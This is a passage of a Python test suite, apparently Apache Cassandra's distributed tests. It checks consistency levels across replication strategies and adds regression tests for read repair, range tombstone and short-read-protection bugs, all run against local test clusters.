(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.LOCAL_SERIAL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.LOCAL_SERIAL),
]
self._test_network_topology_strategy(combinations)
@pytest.mark.resource_intensive
@since("3.0")
def test_network_topology_strategy_each_quorum(self):
"""
@jira_ticket CASSANDRA-10584
Test for multiple datacenters, using network topology strategy, only
the each quorum reads.
"""
self.nodes = [3, 3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3), ('dc3', 3)])
self._start_cluster()
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
self._test_network_topology_strategy(combinations)
class TestAccuracy(TestHelper):
"""
Test that we can consistently read back what we wrote depending on the write and read consistency levels.
"""
class Validation:
def __init__(self, outer, sessions, nodes, rf_factors, start, end, write_cl, read_cl, serial_cl=None):
self.outer = outer
self.sessions = sessions
self.nodes = nodes
self.rf_factors = rf_factors
self.start = start
self.end = end
self.write_cl = write_cl
self.read_cl = read_cl
self.serial_cl = serial_cl
logger.debug('Testing accuracy with WRITE/READ/SERIAL consistency set to {}/{}/{} (keys : {} to {})'
.format(consistency_value_to_name(write_cl), consistency_value_to_name(read_cl), consistency_value_to_name(serial_cl), start, end - 1))
def get_expected_consistency(self, idx):
return self.outer.get_expected_consistency(idx, self.rf_factors, self.write_cl, self.read_cl)
def validate_users(self):
"""
First validation function: update the users table sending different values to different sessions
and check that when strong_consistency is true (R + W > N) we read back the latest value from all sessions.
If strong_consistency is false we instead check that we read back the latest value from at least
the number of nodes we wrote to.
"""
outer = self.outer
sessions = self.sessions
start = self.start
end = self.end
write_cl = self.write_cl
read_cl = self.read_cl
serial_cl = self.serial_cl
def check_all_sessions(idx, n, val):
expected_consistency = self.get_expected_consistency(idx)
num = 0
for s in sessions:
if outer.query_user(s, n, val, read_cl, check_ret=expected_consistency.is_strong):
num += 1
assert num >= expected_consistency.num_write_nodes, "Failed to read value from sufficient number of nodes," + \
" required {} but got {} - [{}, {}]".format(expected_consistency.num_write_nodes, num, n, val)
for n in range(start, end):
age = 30
for s in range(0, len(sessions)):
outer.insert_user(sessions[s], n, age, write_cl, serial_cl)
check_all_sessions(s, n, age)
if serial_cl is None:
age += 1
for s in range(0, len(sessions)):
outer.update_user(sessions[s], n, age, write_cl, serial_cl, age - 1)
check_all_sessions(s, n, age)
age += 1
outer.delete_user(sessions[0], n, write_cl)
check_all_sessions(s, n, None)
def validate_counters(self):
"""
Second validation function: update the counters table sending different values to different sessions
and check that when strong_consistency is true (R + W > N) we read back the latest value from all sessions.
If strong_consistency is false we instead check that we read back the latest value from at least
the number of nodes we wrote to.
"""
outer = self.outer
sessions = self.sessions
start = self.start
end = self.end
write_cl = self.write_cl
read_cl = self.read_cl
serial_cl = self.serial_cl
def check_all_sessions(idx, n, val):
expected_consistency = self.get_expected_consistency(idx)
results = []
for s in sessions:
results.append(outer.query_counter(s, n, val, read_cl, check_ret=expected_consistency.is_strong))
assert results.count(val) >= expected_consistency.num_write_nodes, "Failed to read value from sufficient number of nodes, required {} nodes to have a" + \
" counter value of {} at key {}, instead got these values: {}".format(expected_consistency.num_write_nodes, val, n, results)
for n in range(start, end):
c = 1
for s in range(0, len(sessions)):
outer.update_counter(sessions[s], n, write_cl, serial_cl)
check_all_sessions(s, n, c)
# Update the counter again at CL ALL to make sure all nodes are on the same page
# since a counter update requires a read
outer.update_counter(sessions[s], n, ConsistencyLevel.ALL)
c += 2 # the counter was updated twice
def _run_test_function_in_parallel(self, valid_fcn, nodes, rf_factors, combinations):
"""
Run a test function in parallel.
"""
requires_local_reads = False
for combination in combinations:
for i, _ in enumerate(nodes):
expected_consistency = self.get_expected_consistency(i, rf_factors, combination[0], combination[1])
if not expected_consistency.is_strong:
# if at least one combination does not reach strong consistency, in order to validate weak
# consistency we require local reads, see CASSANDRA-12092 for details.
requires_local_reads = True
break
if requires_local_reads:
break
self._start_cluster(save_sessions=True, requires_local_reads=requires_local_reads)
input_queue = queue.Queue()
exceptions_queue = queue.Queue()
def run():
while not input_queue.empty():
try:
v = TestAccuracy.Validation(self, self.sessions, nodes, rf_factors, *input_queue.get(block=False))
valid_fcn(v)
except queue.Empty:
pass
except Exception:
exceptions_queue.put(sys.exc_info())
start = 0
num_keys = 50
for combination in combinations:
input_queue.put((start, start + num_keys) + combination)
start += num_keys
threads = []
for n in range(0, 8):
t = threading.Thread(target=run)
t.setDaemon(True)
t.start()
threads.append(t)
logger.debug("Waiting for workers to complete")
while exceptions_queue.empty():
time.sleep(0.1)
if len([t for t in threads if t.isAlive()]) == 0:
break
if not exceptions_queue.empty():
_, exceptions, tracebacks = list(zip(*exceptions_queue.queue))
raise MultiError(exceptions=exceptions, tracebacks=tracebacks)
@pytest.mark.resource_intensive
def test_simple_strategy_users(self):
"""
Test for a single datacenter, users table, only the each quorum reads.
"""
self.nodes = 5
self.rf = 3
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.QUORUM),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.ONE, ConsistencyLevel.THREE),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ANY, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.TWO),
(ConsistencyLevel.TWO, ConsistencyLevel.ONE),
# These are multi-DC consistency levels that should default to quorum calls
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.SERIAL),
]
logger.debug("Testing single dc, users")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_users, [self.nodes], [self.rf], combinations)
@pytest.mark.resource_intensive
@since("3.0")
def test_simple_strategy_each_quorum_users(self):
"""
@jira_ticket CASSANDRA-10584
Test for a single datacenter, users table, only the each quorum reads.
"""
self.nodes = 5
self.rf = 3
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
logger.debug("Testing single dc, users, each quorum reads")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_users, [self.nodes], [self.rf], combinations)
@pytest.mark.resource_intensive
def test_network_topology_strategy_users(self):
"""
Test for multiple datacenters, users table.
"""
self.nodes = [3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3)])
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.ONE, ConsistencyLevel.THREE),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ANY, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.TWO),
(ConsistencyLevel.TWO, ConsistencyLevel.ONE),
(ConsistencyLevel.QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.LOCAL_SERIAL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.LOCAL_SERIAL),
]
logger.debug("Testing multiple dcs, users")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_users, self.nodes, list(self.rf.values()), combinations),
@pytest.mark.resource_intensive
@since("3.0")
def test_network_topology_strategy_each_quorum_users(self):
"""
@jira_ticket CASSANDRA-10584
Test for a multiple datacenters, users table, only the each quorum
reads.
"""
self.nodes = [3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3)])
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
logger.debug("Testing multiple dcs, users, each quorum reads")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_users, self.nodes, list(self.rf.values()), combinations)
def test_simple_strategy_counters(self):
"""
Test for a single datacenter, counters table.
"""
self.nodes = 3
self.rf = 3
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.QUORUM),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.ONE, ConsistencyLevel.THREE),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.TWO),
(ConsistencyLevel.TWO, ConsistencyLevel.ONE),
# These are multi-DC consistency levels that should default to quorum calls
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
]
logger.debug("Testing single dc, counters")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_counters, [self.nodes], [self.rf], combinations)
@since("3.0")
def test_simple_strategy_each_quorum_counters(self):
"""
@jira_ticket CASSANDRA-10584
Test for a single datacenter, counters table, only the each quorum
reads.
"""
self.nodes = 3
self.rf = 3
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
logger.debug("Testing single dc, counters, each quorum reads")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_counters, [self.nodes], [self.rf], combinations)
@pytest.mark.resource_intensive
def test_network_topology_strategy_counters(self):
"""
Test for multiple datacenters, counters table.
"""
self.nodes = [3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3)])
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.ONE),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.ONE, ConsistencyLevel.THREE),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE),
(ConsistencyLevel.ONE, ConsistencyLevel.TWO),
(ConsistencyLevel.TWO, ConsistencyLevel.ONE),
]
logger.debug("Testing multiple dcs, counters")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_counters, self.nodes, list(self.rf.values()), combinations),
@pytest.mark.resource_intensive
@since("3.0")
def test_network_topology_strategy_each_quorum_counters(self):
"""
@jira_ticket CASSANDRA-10584
Test for multiple datacenters, counters table, only the each quorum
reads.
"""
self.nodes = [3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3)])
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
logger.debug("Testing multiple dcs, counters, each quorum reads")
self._run_test_function_in_parallel(TestAccuracy.Validation.validate_counters, self.nodes, list(self.rf.values()), combinations),
class TestConsistency(Tester):
@since('3.0')
def test_14513_transient(self):
"""
@jira_ticket CASSANDRA-14513
A reproduction / regression test to illustrate CASSANDRA-14513:
transient data loss when doing reverse-order queries with range
tombstones in place.
This test shows how the bug can cause queries to return invalid
results by just a single node.
"""
cluster = self.cluster
# set column_index_size_in_kb to 1 for a slightly easier reproduction sequence
cluster.set_configuration_options(values={'column_index_size_in_kb': 1})
cluster.populate(1).start(wait_other_notice=True)
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE journals WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 1};"
session.execute(query)
query = 'CREATE TABLE journals.logs (user text, year int, month int, day int, title text, body text, PRIMARY KEY ((user), year, month, day, title));';
session.execute(query)
# populate the table
stmt = session.prepare('INSERT INTO journals.logs (user, year, month, day, title, body) VALUES (?, ?, ?, ?, ?, ?);');
for year in range(2011, 2018):
for month in range(1, 13):
for day in range(1, 31):
session.execute(stmt, ['beobal', year, month, day, 'title', 'Lorem ipsum dolor sit amet'], ConsistencyLevel.ONE)
node1.flush()
# make sure the data is there
assert_all(session,
"SELECT COUNT(*) FROM journals.logs WHERE user = 'beobal' AND year < 2018 ORDER BY year DESC;",
[[7 * 12 * 30]],
cl=ConsistencyLevel.ONE)
# generate an sstable with an RT that opens in the penultimate block and closes in the last one
stmt = session.prepare('DELETE FROM journals.logs WHERE user = ? AND year = ? AND month = ? AND day = ?;')
batch = BatchStatement(batch_type=BatchType.UNLOGGED)
for day in range(1, 31):
batch.add(stmt, ['beobal', 2018, 1, day])
session.execute(batch)
node1.flush()
# the data should still be there for years 2011-2017, but prior to CASSANDRA-14513 it would've been gone
assert_all(session,
"SELECT COUNT(*) FROM journals.logs WHERE user = 'beobal' AND year < 2018 ORDER BY year DESC;",
[[7 * 12 * 30]],
cl=ConsistencyLevel.ONE)
@since('3.0')
def test_14513_permanent(self):
"""
@jira_ticket CASSANDRA-14513
A reproduction / regression test to illustrate CASSANDRA-14513:
permanent data loss when doing reverse-order queries with range
tombstones in place.
This test shows how the invalid RT can propagate to other replicas
and delete data permanently.
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
# set column_index_size_in_kb to 1 for a slightly easier reproduction sequence
cluster.set_configuration_options(values={'column_index_size_in_kb': 1, 'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(3).start(wait_other_notice=True)
node1, node2, node3 = cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
query = "CREATE KEYSPACE journals WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 3};"
session.execute(query)
query = 'CREATE TABLE journals.logs (user text, year int, month int, day int, title text, body text, PRIMARY KEY ((user), year, month, day, title));';
session.execute(query)
# populate the table
stmt = session.prepare('INSERT INTO journals.logs (user, year, month, day, title, body) VALUES (?, ?, ?, ?, ?, ?);');
for year in range(2011, 2018):
for month in range(1, 13):
for day in range(1, 31):
session.execute(stmt, ['beobal', year, month, day, 'title', 'Lorem ipsum dolor sit amet'], ConsistencyLevel.QUORUM)
cluster.flush()
# make sure the data is there
assert_all(session,
"SELECT COUNT(*) FROM journals.logs WHERE user = 'beobal' AND year < 2018 ORDER BY year DESC;",
[[7 * 12 * 30]],
cl=ConsistencyLevel.QUORUM)
# take one node down
node3.stop(wait_other_notice=True)
# generate an sstable with an RT that opens in the penultimate block and closes in the last one
stmt = session.prepare('DELETE FROM journals.logs WHERE user = ? AND year = ? AND month = ? AND day = ?;')
batch = BatchStatement(batch_type=BatchType.UNLOGGED)
for day in range(1, 31):
batch.add(stmt, ['beobal', 2018, 1, day])
session.execute(batch, [], ConsistencyLevel.QUORUM)
node1.flush()
node2.flush()
# take node2 down, get node3 up
node2.stop(wait_other_notice=True)
node3.start(wait_other_notice=True)
# insert an RT somewhere so that we would have a closing marker and RR makes its mutations
stmt = SimpleStatement("DELETE FROM journals.logs WHERE user = 'beobal' AND year = 2010 AND month = 12 AND day = 30",
consistency_level=ConsistencyLevel.QUORUM)
session.execute(stmt)
# this read will trigger read repair with the invalid RT and propagate the wide broken RT,
# permanently killing the partition
stmt = SimpleStatement("SELECT * FROM journals.logs WHERE user = 'beobal' AND year < 2018 ORDER BY year DESC;",
consistency_level=ConsistencyLevel.QUORUM)
session.execute(stmt)
# everything is gone
assert_all(session,
"SELECT COUNT(*) FROM journals.logs WHERE user = 'beobal';",
[[7 * 12 * 30]],
cl=ConsistencyLevel.QUORUM)
@since('3.0')
def test_14330(self):
"""
@jira_ticket CASSANDRA-14330
A regression test to prove that we no longer trigger
AssertionError during read repair in DataResolver
when encountering a repeat open RT bound from short
read protection responses.
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start(wait_other_notice=True)
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node2)
query = "CREATE KEYSPACE test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
session.execute(query)
# with all nodes up, insert an RT and 2 rows on every node
#
# node1 | RT[0...] 0 1
# node2 | RT[0...] 0 1
session.execute('DELETE FROM test.test USING TIMESTAMP 0 WHERE pk = 0 AND ck >= 0;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 0) USING TIMESTAMP 1;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 1) USING TIMESTAMP 1;')
# with node1 down, delete row 0 on node2
#
# node1 | RT[0...] 0 1
# node2 | RT[0...] x 1
node1.stop(wait_other_notice=True)
session.execute('DELETE FROM test.test USING TIMESTAMP 1 WHERE pk = 0 AND ck = 0;')
node1.start(wait_other_notice=True, wait_for_binary_proto=True)
# with both nodes up, make a LIMIT 1 read that would trigger a short read protection
# request, which in turn will trigger the AssertionError in DataResolver (prior to
# CASSANDRA-14330 fix)
assert_all(session,
'SELECT ck FROM test.test WHERE pk = 0 LIMIT 1;',
[[1]],
cl=ConsistencyLevel.ALL)
@since('3.0')
def test_13911(self):
"""
@jira_ticket CASSANDRA-13911
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start(wait_other_notice=True)
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
session.execute(query)
# with node2 down, insert row 0 on node1
#
# node1, partition 0 | 0
# node2, partition 0 |
node2.stop(wait_other_notice=True)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 0);')
node2.start(wait_other_notice=True, wait_for_binary_proto=True)
# with node1 down, delete row 1 and 2 on node2
#
# node1, partition 0 | 0
# node2, partition 0 | x x
session = self.patient_cql_connection(node2)
node1.stop(wait_other_notice=True)
session.execute('DELETE FROM test.test WHERE pk = 0 AND ck IN (1, 2);')
node1.start(wait_other_notice=True, wait_for_binary_proto=True)
# with both nodes up, do a CL.ALL query with per partition limit of 1;
# prior to CASSANDRA-13911 this would trigger an IllegalStateException
assert_all(session,
'SELECT DISTINCT pk FROM test.test;',
[[0]],
cl=ConsistencyLevel.ALL)
@since('3.11')
def test_13911_rows_srp(self):
"""
@jira_ticket CASSANDRA-13911
A regression test to prove that we can no longer rely on
!singleResultCounter.isDoneForPartition() to abort single
partition SRP early if a per partition limit is set.
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start(wait_other_notice=True)
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
session.execute(query)
# with node2 down
#
# node1, partition 0 | 0 1 - -
# node1, partition 2 | 0 x - -
node2.stop(wait_other_notice=True)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 0) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 1) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 0) USING TIMESTAMP 42;')
session.execute('DELETE FROM test.test USING TIMESTAMP 42 WHERE pk = 2 AND ck = 1;')
node2.start(wait_other_notice=True, wait_for_binary_proto=True)
# with node1 down
#
# node2, partition 0 | - - 2 3
# node2, partition 2 | x 1 2 -
session = self.patient_cql_connection(node2)
node1.stop(wait_other_notice=True)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 2) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 3) USING TIMESTAMP 42;')
session.execute('DELETE FROM test.test USING TIMESTAMP 42 WHERE pk = 2 AND ck = 0;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 1) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 2) USING TIMESTAMP 42;')
node1.start(wait_other_notice=True, wait_for_binary_proto=True)
# with both nodes up, do a CL.ALL query with per partition limit of 2 and limit of 3;
# without the change to if (!singleResultCounter.isDoneForPartition()) branch,
# the query would skip SRP on node2, partition 2, and incorrectly return just
# [[0, 0], [0, 1]]
assert_all(session,
'SELECT pk, ck FROM test.test PER PARTITION LIMIT 2 LIMIT 3;',
[[0, 0], [0, 1],
[2, 2]],
cl=ConsistencyLevel.ALL)
@since('3.11')
def test_13911_partitions_srp(self):
"""
@jira_ticket CASSANDRA-13911
A regression test to prove that we can't rely on
!singleResultCounter.isDone() to abort ranged
partition SRP early if a per partition limit is set.
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start(wait_other_notice=True)
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
session.execute(query)
# with node2 down
#
# node1, partition 0 | 0 1 - -
# node1, partition 2 | x x - -
node2.stop(wait_other_notice=True)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 0) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 1) USING TIMESTAMP 42;')
session.execute('DELETE FROM test.test USING TIMESTAMP 42 WHERE pk = 2 AND ck IN (0, 1);')
node2.start(wait_other_notice=True, wait_for_binary_proto=True)
# with node1 down
#
# node2, partition 0 | - - 2 3
# node2, partition 2 | 0 1 - -
# node2, partition 4 | 0 1 - -
session = self.patient_cql_connection(node2)
node1.stop(wait_other_notice=True)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 2) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 3) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 0) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 1) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (4, 0) USING TIMESTAMP 42;')
session.execute('INSERT INTO test.test (pk, ck) VALUES (4, 1) USING TIMESTAMP 42;')
node1.start(wait_other_notice=True, wait_for_binary_proto=True)
# with both nodes up, do a CL.ALL query with per partition limit of 2 and limit of 4;
# without the extra condition in if (!singleResultCounter.isDone()) branch,
# the query would skip partitions SRP on node2 at the end of partition 2,
# and incorrectly return just [[0, 0], [0, 1]]
assert_all(session,
'SELECT pk, ck FROM test.test PER PARTITION LIMIT 2 LIMIT 4;',
[[0, 0], [0, 1],
[4, 0], [4, 1]],
cl=ConsistencyLevel.ALL)
@since('3.0')
def test_13880(self):
"""
@jira_ticket CASSANDRA-13880
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start(wait_other_notice=True)
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = "CREATE TABLE IF NOT EXISTS test.test (id int PRIMARY KEY);"
session.execute(query)
stmt = SimpleStatement("INSERT INTO test.test (id) VALUES (0);",
consistency_level=ConsistencyLevel.ALL)
session.execute(stmt)
# with node2 down and hints disabled, delete the partition on node1
node2.stop(wait_other_notice=True)
session.execute("DELETE FROM test.test WHERE id = 0;")
node2.start(wait_other_notice=True)
# with both nodes up, do a CL.ALL query with per partition limit of 1;
# prior to CASSANDRA-13880 this would cause short read protection to loop forever
assert_none(session, "SELECT DISTINCT id FROM test.test WHERE id = 0;", cl=ConsistencyLevel.ALL)
@since('3.0')
def test_13747(self):
"""
@jira_ticket CASSANDRA-13747
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start(wait_other_notice=True)
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = "CREATE TABLE IF NOT EXISTS test.test (id int PRIMARY KEY);"
session.execute(query)
#
# populate the table with 10 rows:
#
# -7509452495886106294 | 5
# -4069959284402364209 | 1 x
# -3799847372828181882 | 8
# -3485513579396041028 | 0 x
# -3248873570005575792 | 2
# -2729420104000364805 | 4 x
# 1634052884888577606 | 7
# 2705480034054113608 | 6 x
# 3728482343045213994 | 9
# 9010454139840013625 | 3 x
stmt = session.prepare("INSERT INTO test.test (id) VALUES (?);")
for id in range(0, 10):
session.execute(stmt, [id], ConsistencyLevel.ALL)
# with node2 down and hints disabled, delete every other row on node1
node2.stop(wait_other_notice=True)
session.execute("DELETE FROM test.test WHERE id IN (1, 0, 4, 6, 3);")
# with both nodes up, do a DISTINCT range query with CL.ALL;
# prior to CASSANDRA-13747 this would cause an assertion in short read protection code
node2.start(wait_other_notice=True)
stmt = SimpleStatement("SELECT DISTINCT token(id), id FROM test.test;",
consistency_level=ConsistencyLevel.ALL)
result = list(session.execute(stmt))
assert_length_equal(result, 5)
@since('3.0')
def test_13595(self):
"""
@jira_ticket CASSANDRA-13595
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2)
node1, node2 = cluster.nodelist()
remove_perf_disable_shared_mem(node1) # necessary for jmx
cluster.start(wait_other_notice=True)
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = 'CREATE TABLE IF NOT EXISTS test.test (id int PRIMARY KEY);'
session.execute(query)
# populate the table with 10 partitions,
# then delete a bunch of them on different nodes
# until we get the following pattern:
# token | k | 1 | 2 |
# -7509452495886106294 | 5 | n | y |
# -4069959284402364209 | 1 | y | n |
# -3799847372828181882 | 8 | n | y |
# -3485513579396041028 | 0 | y | n |
# -3248873570005575792 | 2 | n | y |
# -2729420104000364805 | 4 | y | n |
# 1634052884888577606 | 7 | n | y |
# 2705480034054113608 | 6 | y | n |
# 3728482343045213994 | 9 | n | y |
# 9010454139840013625 | 3 | y | y |
stmt = session.prepare('INSERT INTO test.test (id) VALUES (?);')
